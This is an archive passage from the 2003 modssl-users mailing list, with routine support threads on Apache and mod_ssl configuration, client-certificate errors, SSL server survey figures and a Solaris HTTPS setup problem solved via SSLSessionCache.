Date: Fri, 31 Jan 2003 15:13:04 -0600
Mime-Version: 1.0 (Apple Message framework v551)
Content-Type: text/plain; charset=US-ASCII; format=flowed
Subject: Select non-SSL'ing
From: Cory 'G' Watson 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
Message-Id: 
X-Mailer: Apple Mail (2.551)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cory 'G' Watson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I need to disallow HTTP to an entire site, with the exception of a few 
directories.  Can someone give me a clue how to do this?

I have the disallowing of HTTP fixed, but I can't find a way to ALLOW 
http for the directories I need.  I've searched the archives and 
googled pretty hard, but not found what I am looking for.

Thanks!

Cory 'G' Watson
http://gcdb.spleck.net

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 31 23:42:19 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9D2182AA09E; Fri, 31 Jan 2003 23:42:19 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from deepthought.cs.virginia.edu (deepthought.cs.Virginia.EDU [128.143.69.223])
	by master.modssl.org (Postfix) with ESMTP id 8406B2AA086
	for ; Fri, 31 Jan 2003 23:42:09 +0100 (CET)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id h0VMf5h8026444
	for ; Fri, 31 Jan 2003 17:41:07 -0500
Date: Fri, 31 Jan 2003 17:41:05 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Select non-SSL'ing
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, 31 Jan 2003, Cory 'G' Watson wrote:

> I have the disallowing of HTTP fixed, but I can't find a way to ALLOW
> http for the directories I need.  I've searched the archives and
> googled pretty hard, but not found what I am looking for.

I'd think some creative uses of RewriteRules could get you what you want
pretty easily.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Feb  1 02:08:01 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3701C2AA0CA; Sat,  1 Feb 2003 02:08:01 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from scgis.com (adsl-068-016-197-035.sip.cae.bellsouth.net [68.16.197.35])
	by master.modssl.org (Postfix) with ESMTP id 1935A2AA081
	for ; Sat,  1 Feb 2003 02:07:59 +0100 (CET)
Received: from crash (adsl-068-016-197-034.sip.cae.bellsouth.net [68.16.197.34] (may be forged))
	by scgis.com (8.12.6/8.12.6) with SMTP id h0VIffrt037448
	for ; Fri, 31 Jan 2003 13:41:42 -0500 (EST)
	(envelope-from cdavis@scgis.com)
Message-ID: <001e01c2c958$c7825e30$0301010a@crash>
From: "Chris Davis" 
To: 
References: 
Subject: Re: modssl versus other ssl servers
Date: Fri, 31 Jan 2003 13:44:20 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Chris Davis" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


 I was looking for some of the automated test mechanisms like Netcraft.
 I found a recently updated survey at
http://www.securityspace.com/s_survey/data/.
 The survey provides Web and SSL site stats independently but the SSL server
 break down does not include modssl. Instead there is an apache module
 section. It does make sense but takes more work to understand the results.
 Apache has 50.88 percent of the ssl market in December 2002.  Apparently
 26.49 percent of the apache servers that answered include modssl in
 the response (1414225 servers). However this is not listed under
 the secure servers suvey.Perhaps some of these have modssl installed
 but SSL  not enabled. This is exactly the kind of survey I was looking
 for.  Thanks for all the responses.


>
> Any answer you get will probably be a best guess.  The closest stat on
> modssl use might relate somewhat to the number of list memebers here,
> though, even that number will not be fully definative as some folks use
> more then one product, some onlyread the list and not really have modssl
> up and running, etc...
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Feb  1 05:20:01 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 60AB52AA0CA; Sat,  1 Feb 2003 05:20:01 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from dc-mx14.cluster1.charter.net (dc-mx14.cluster1.charter.net [209.225.8.24])
	by master.modssl.org (Postfix) with ESMTP id 6C63D2AA085
	for ; Sat,  1 Feb 2003 05:19:59 +0100 (CET)
Received: from [68.112.93.199] (HELO cafes.net)
  by dc-mx14.cluster1.charter.net (CommuniGate Pro SMTP 3.5.9)
  with ESMTP id 61234471 for modssl-users@modssl.org; Fri, 31 Jan 2003 23:19:53 -0500
Date: Fri, 31 Jan 2003 22:19:45 -0600
Subject: Re: Select non-SSL'ing
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v551)
From: Cory 'G' Watson 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
In-Reply-To: 
Message-Id: <64FECBB8-359C-11D7-A818-0003939CCA58@cafes.net>
X-Mailer: Apple Mail (2.551)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cory 'G' Watson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


On Friday, January 31, 2003, at 04:41 PM, Cliff Woolley wrote:
>
>> I have the disallowing of HTTP fixed, but I can't find a way to ALLOW
>> http for the directories I need.  I've searched the archives and
>> googled pretty hard, but not found what I am looking for.
>
> I'd think some creative uses of RewriteRules could get you what you 
> want
> pretty easily.

Good deal.  I'll investigate!  Thanks!

Cory 'G' Watson
http://gcdb.spleck.net

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb  3 09:50:23 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4328F2AA0AA; Mon,  3 Feb 2003 09:50:23 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from smtp01.wxs.nl (smtp01.wxs.nl [195.121.6.61])
	by master.modssl.org (Postfix) with ESMTP id 4776B2AA085
	for ; Mon,  3 Feb 2003 09:50:21 +0100 (CET)
Received: from apps18.wxs.nl ([195.121.7.151]) by smtp01.wxs.nl
          (Netscape Messaging Server 4.15) with ESMTP id H9Q5T801.0JR;
          Mon, 3 Feb 2003 09:48:44 +0100 
Message-ID: <4225713.1044262165229.JavaMail.root@apps18.wxs.nl>
Date: Mon, 3 Feb 2003 09:49:25 +0100 (CET)
From: cybersushi@planet.nl
To: omar.tantaoui@atexo.com, modssl-users@modssl.org
Subject: RE: Error while requesting client cert authentication 
Mime-Version: 1.0
Content-Type: multipart/mixed; 
	boundary="----=_Part_2763_2366550.1044262165226"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: cybersushi@planet.nl
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_2763_2366550.1044262165226
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Hi,

We're experiencing the same errors. Did you get an answer on this?

If so could you send it to me??

Best regards,

Danny

>Hi everybody,
>
>I am using Apache-1.3.27 with mod_ssl-2.8.12 and OpenSSL-0.9.7.
>
>I have created a secure area that requires client SSL authentication:
>
>
>DocumentRoot "/var/www/html"
>ServerName 192.168.2.237
>ServerAdmin administrator@atexo.com
>ErrorLog logs/ssl_error_log
>TransferLog logs/ssl_access_log
>
>SSLEngine on
>
>SSLCipherSuite ALL
>
>SSLCertificateFile /usr/local/apache/conf/ssl.crt/server.crt
>SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/server.key
>
>SSLCACertificateFile /var/www/html/pki/ATEXO/testUserCert/ATEXO.crt
>
>SSLCARevocationFile /var/www/html/pki/testUserCert/ATEXO.crl
>
>
>SSLOptions +StdEnvVars +CompatEnvVars
>SSLVerifyClient require
>SSLVerifyDepth 2
>
>
>
>SetEnvIf User-Agent ".*MSIE.*" \
>         nokeepalive ssl-unclean-shutdown \
>         downgrade-1.0 force-response-1.0
>
>CustomLog logs/ssl_request_log \
>          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
>
>
>The server responds correctly to clients (IE or Mozilla) when it is freshly
>started. But after few minutes of running, I try to access to the same page
>with Mozilla but it fails with the error: "Error establishing an encryted
>connection to 192.168.2.237. Error Code: -12192" and IE displays a classical
>error "Page not found".
>
>When it happens, The Apache log contains these lines:
>[Fri Jan 31 10:10:44 2003] [error] mod_ssl: Certificate Verification: Error
>(7): certificate signature failure
>[Fri Jan 31 10:10:44 2003] [error] mod_ssl: Re-negotiation handshake failed:
>Not accepted by client!?
>[Fri Jan 31 10:10:44 2003] [error] mod_ssl: Certificate Verification: Error
>(7): certificate signature failure
>[Fri Jan 31 10:10:44 2003] [error] mod_ssl: SSL error on writing data
>(OpenSSL library error follows)
>[Fri Jan 31 10:10:44 2003] [error] OpenSSL:
>error:0D0890A1:lib(13):func(137):reason(161)
>[Fri Jan 31 10:10:44 2003] [error] OpenSSL:
>error:140890B2:lib(20):func(137):reason(178)
>
>Please any help is welcome. It has been 10 days that I'm trying to solve
>this problem ...
>
>Best regards

------=_Part_2763_2366550.1044262165226--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb  3 15:49:31 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C78422AA0DD; Mon,  3 Feb 2003 15:49:31 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from william-taft.konsultek.com (68-21-30-198.ded.ameritech.net [68.21.30.198])
	by master.modssl.org (Postfix) with ESMTP id 9A9E42AA0BF
	for ; Mon,  3 Feb 2003 15:49:29 +0100 (CET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: newbie request for assistance
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Date: Mon, 3 Feb 2003 08:49:28 -0600
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: newbie request for assistance
Thread-Index: AcLLk3OdA0csxD+ATj6CNh5+I895QA==
From: "Kurt A. Buckardt" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kurt A. Buckardt" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am trying to bring up Apache 2.0.44 with mod_ssl module on Solaris 8,
and can't get an https connection to the box.  Http works just fine.
Any suggestions on how to proceed would be greatly appreciated.

I've downloaded & installed OpenSSL 0.9.6g (sunfreeware.comn
I've created a certificate and key:
/usr/local/apache2/conf/ssl.crt/server.crt
/usr/local/apache2/conf/ssl.key/server.key
I've downloaded, compiled, & made Apache with --enable-ssl

Here's Apache's ssl.conf file, which is called from Apache's httpd.conf
file:

Listen 443

AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl

SSLPassPhraseDialog  builtin

SSLSessionCache         dbm:logs/ssl_scache
SSLSessionCacheTimeout  300

SSLMutex  file:logs/ssl_mutex

SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
SSLRandomSeed startup file:/dev/urandom 512



DocumentRoot "/usr/local/apache2/htdocs"
ServerName new.host.name:443
ServerAdmin you@your.address
ErrorLog logs/error_log
TransferLog logs/access_log

SSLEngine on

SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

SSLCertificateFile /usr/local/apache2/conf/ssl.crt/server.crt

SSLCertificateKeyFile /usr/local/apache2/conf/ssl.key/server.key


    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars


SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

CustomLog logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"



=20
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb  3 17:43:01 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D1D062AA0B8; Mon,  3 Feb 2003 17:43:01 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 131172AA081
	for ; Mon,  3 Feb 2003 17:42:58 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id LAA27560;
	Mon, 3 Feb 2003 11:41:43 -0500
Date: Mon, 3 Feb 2003 11:41:42 -0500 (EST)
From: "R. DuFresne" 
To: "Kurt A. Buckardt" 
Cc: modssl-users@modssl.org
Subject: Re: newbie request for assistance
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


If I recall, apache on sun boxen requires some additional work to get
/dev/urandome PRNG to work ccorrectly.  This is a common question,
and is other covered in the archives, or might well be in the FAQ.

If this is incorrect, or not the issue at hand, others will step in to
spank me into clued space .


Thanks,

Ron DuFresne


On Mon, 3 Feb 2003, Kurt A. Buckardt wrote:

> I am trying to bring up Apache 2.0.44 with mod_ssl module on Solaris 8,
> and can't get an https connection to the box.  Http works just fine.
> Any suggestions on how to proceed would be greatly appreciated.
> 
> I've downloaded & installed OpenSSL 0.9.6g (sunfreeware.comn
> I've created a certificate and key:
> /usr/local/apache2/conf/ssl.crt/server.crt
> /usr/local/apache2/conf/ssl.key/server.key
> I've downloaded, compiled, & made Apache with --enable-ssl
> 
> Here's Apache's ssl.conf file, which is called from Apache's httpd.conf
> file:
> 
> Listen 443
> 
> AddType application/x-x509-ca-cert .crt
> AddType application/x-pkcs7-crl    .crl
> 
> SSLPassPhraseDialog  builtin
> 
> SSLSessionCache         dbm:logs/ssl_scache
> SSLSessionCacheTimeout  300
> 
> SSLMutex  file:logs/ssl_mutex
> 
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> SSLRandomSeed startup file:/dev/urandom 512
> 
> 
> 
> DocumentRoot "/usr/local/apache2/htdocs"
> ServerName new.host.name:443
> ServerAdmin you@your.address
> ErrorLog logs/error_log
> TransferLog logs/access_log
> 
> SSLEngine on
> 
> SSLCipherSuite
> ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> 
> SSLCertificateFile /usr/local/apache2/conf/ssl.crt/server.crt
> 
> SSLCertificateKeyFile /usr/local/apache2/conf/ssl.key/server.key
> 
> 
>     SSLOptions +StdEnvVars
> 
> 
>     SSLOptions +StdEnvVars
> 
> 
> SetEnvIf User-Agent ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
> 
> CustomLog logs/ssl_request_log \
>           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> 
> 
> 
>  
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb  3 17:58:22 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 70D8F2AA0B8; Mon,  3 Feb 2003 17:58:22 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mel-rto3.wanadoo.fr (smtp-out-3.wanadoo.fr [193.252.19.233])
	by master.modssl.org (Postfix) with ESMTP id F41222AA0AA
	for ; Mon,  3 Feb 2003 17:58:16 +0100 (CET)
Received: from mel-rta7.wanadoo.fr (193.252.19.61) by mel-rto3.wanadoo.fr (6.7.015)
        id 3E0C33B5017AC16A for modssl-users@modssl.org; Mon, 3 Feb 2003 17:58:16 +0100
Received: from OTANTAOUI (80.15.72.163) by mel-rta7.wanadoo.fr (6.7.015)
        id 3E26CE5400B22568 for modssl-users@modssl.org; Mon, 3 Feb 2003 17:58:16 +0100
From: "Omar TANTAOUI" 
To: 
Subject: RE: newbie request for assistance
Date: Mon, 3 Feb 2003 17:58:14 +0100
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Omar TANTAOUI" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Have you added the line
"Listen 443"
in your httpd.conf file ? If no, make a search on "Listen 80" and copy
"Listen 443" under.

Omar.

> -----Message d'origine-----
> De : owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]De la part de Kurt A. Buckardt
> Envoye : lundi 3 fevrier 2003 15:49
> A : modssl-users@modssl.org
> Objet : newbie request for assistance
>
>
> I am trying to bring up Apache 2.0.44 with mod_ssl module on Solaris 8,
> and can't get an https connection to the box.  Http works just fine.
> Any suggestions on how to proceed would be greatly appreciated.
>
> I've downloaded & installed OpenSSL 0.9.6g (sunfreeware.comn
> I've created a certificate and key:
> /usr/local/apache2/conf/ssl.crt/server.crt
> /usr/local/apache2/conf/ssl.key/server.key
> I've downloaded, compiled, & made Apache with --enable-ssl
>
> Here's Apache's ssl.conf file, which is called from Apache's httpd.conf
> file:
> 
> Listen 443
>
> AddType application/x-x509-ca-cert .crt
> AddType application/x-pkcs7-crl    .crl
>
> SSLPassPhraseDialog  builtin
>
> SSLSessionCache         dbm:logs/ssl_scache
> SSLSessionCacheTimeout  300
>
> SSLMutex  file:logs/ssl_mutex
>
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> SSLRandomSeed startup file:/dev/urandom 512
>
> 
>
> DocumentRoot "/usr/local/apache2/htdocs"
> ServerName new.host.name:443
> ServerAdmin you@your.address
> ErrorLog logs/error_log
> TransferLog logs/access_log
>
> SSLEngine on
>
> SSLCipherSuite
> ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>
> SSLCertificateFile /usr/local/apache2/conf/ssl.crt/server.crt
>
> SSLCertificateKeyFile /usr/local/apache2/conf/ssl.key/server.key
>
> 
>     SSLOptions +StdEnvVars
> 
> 
>     SSLOptions +StdEnvVars
> 
>
> SetEnvIf User-Agent ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
>
> CustomLog logs/ssl_request_log \
>           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
>
> 
>
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb  3 18:52:13 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DEFE62AA0BD; Mon,  3 Feb 2003 18:52:12 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from william-taft.konsultek.com (68-21-30-198.ded.ameritech.net [68.21.30.198])
	by master.modssl.org (Postfix) with ESMTP id B59222AA081
	for ; Mon,  3 Feb 2003 18:52:10 +0100 (CET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: FW: newbie request for assistance
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Date: Mon, 3 Feb 2003 11:52:09 -0600
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: newbie request for assistance
Thread-Index: AcLLpYUe/q1kAn0aSMuHL8n+Z25QOAABmBGw
From: "Kurt A. Buckardt" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kurt A. Buckardt" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Omar,

Thanks for your response, but isn't this accommodated by the fact that
ssl.conf is "called" from httpd.conf?  Note the "Listen 443" below. =20

Here's the extract from the httpd.conf that I believe calls the
ssl.conf.


    Include conf/ssl.conf


for the record, here's the only error_log output I'm receiving.
[Mon Feb 03 12:45:51 2003] [warn] Init: Session Cache is not configured
[hint: SSLSessionCache]
[Mon Feb 03 12:45:51 2003] [notice] Apache/2.0.44 (Unix) mod_ssl/2.0.44
OpenSSL/0.9.6g configured -- resuming normal operations

Like I said I'm new at this, so what do I know.

Thanks again for responding.

Kurt
-----Original Message-----
From: Omar TANTAOUI [mailto:omar.tantaoui@atexo.com]=20
Sent: Monday, February 03, 2003 10:58 AM
To: modssl-users@modssl.org
Subject: RE: newbie request for assistance

Have you added the line
"Listen 443"
in your httpd.conf file ? If no, make a search on "Listen 80" and copy
"Listen 443" under.

Omar.

> -----Message d'origine-----
> De : owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]De la part de Kurt A. Buckardt
> Envoye : lundi 3 fevrier 2003 15:49
> A : modssl-users@modssl.org
> Objet : newbie request for assistance
>
>
> I am trying to bring up Apache 2.0.44 with mod_ssl module on Solaris
8,
> and can't get an https connection to the box.  Http works just fine.
> Any suggestions on how to proceed would be greatly appreciated.
>
> I've downloaded & installed OpenSSL 0.9.6g (sunfreeware.comn
> I've created a certificate and key:
> /usr/local/apache2/conf/ssl.crt/server.crt
> /usr/local/apache2/conf/ssl.key/server.key
> I've downloaded, compiled, & made Apache with --enable-ssl
>
> Here's Apache's ssl.conf file, which is called from Apache's
httpd.conf
> file:
> 
> Listen 443
>
> AddType application/x-x509-ca-cert .crt
> AddType application/x-pkcs7-crl    .crl
>
> SSLPassPhraseDialog  builtin
>
> SSLSessionCache         dbm:logs/ssl_scache
> SSLSessionCacheTimeout  300
>
> SSLMutex  file:logs/ssl_mutex
>
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> SSLRandomSeed startup file:/dev/urandom 512
>
> 
>
> DocumentRoot "/usr/local/apache2/htdocs"
> ServerName new.host.name:443
> ServerAdmin you@your.address
> ErrorLog logs/error_log
> TransferLog logs/access_log
>
> SSLEngine on
>
> SSLCipherSuite
> ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>
> SSLCertificateFile /usr/local/apache2/conf/ssl.crt/server.crt
>
> SSLCertificateKeyFile /usr/local/apache2/conf/ssl.key/server.key
>
> 
>     SSLOptions +StdEnvVars
> 
> 
>     SSLOptions +StdEnvVars
> 
>
> SetEnvIf User-Agent ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
>
> CustomLog logs/ssl_request_log \
>           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
>
> 
>
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb  3 19:00:07 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 890762AA0BD; Mon,  3 Feb 2003 19:00:07 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id AE9E12AA081
	for ; Mon,  3 Feb 2003 19:00:01 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id 3C3A06E4013; Mon,  3 Feb 2003 18:59:55 +0100 (CET)
Date: Mon, 3 Feb 2003 18:59:55 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: FW: newbie request for assistance
Message-ID: <20030203175955.GA20862@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Feb 03, 2003 at 11:52:09AM -0600, Kurt A. Buckardt wrote:
> for the record, here's the only error_log output I'm receiving.
> [Mon Feb 03 12:45:51 2003] [warn] Init: Session Cache is not configured
> [hint: SSLSessionCache]
> [Mon Feb 03 12:45:51 2003] [notice] Apache/2.0.44 (Unix) mod_ssl/2.0.44
> OpenSSL/0.9.6g configured -- resuming normal operations
> 
Right, so you're missing a configuration directive - see
http://httpd.apache.org/docs-2.0/mod/mod_ssl.html#sslsessioncache

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb  4 03:15:26 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EE20C2AA0BF; Tue,  4 Feb 2003 03:15:25 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from william-taft.konsultek.com (68-21-30-198.ded.ameritech.net [68.21.30.198])
	by master.modssl.org (Postfix) with ESMTP id 3BB442AA08B
	for ; Tue,  4 Feb 2003 03:15:23 +0100 (CET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: log question
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Date: Mon, 3 Feb 2003 20:15:21 -0600
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: log question
Thread-Index: AcLL80Tq1uAeG2lCShyKR8BAVGnfFw==
From: "Kurt A. Buckardt" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kurt A. Buckardt" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I see this entry in the error_log file.=20
[notice] Apache/2.0.44 (Unix) mod_ssl/2.0.44 OpenSSL/0.9.6g configured
-- resuming normal operations

Two dumb questions:
1: If it is informational, why is it in an error log?
2: I have configured OpenSSL 0.9.7 on this box.  Previously (before
Apache was installed) it had OpenSSL 0.9.6g.  Is the reference to
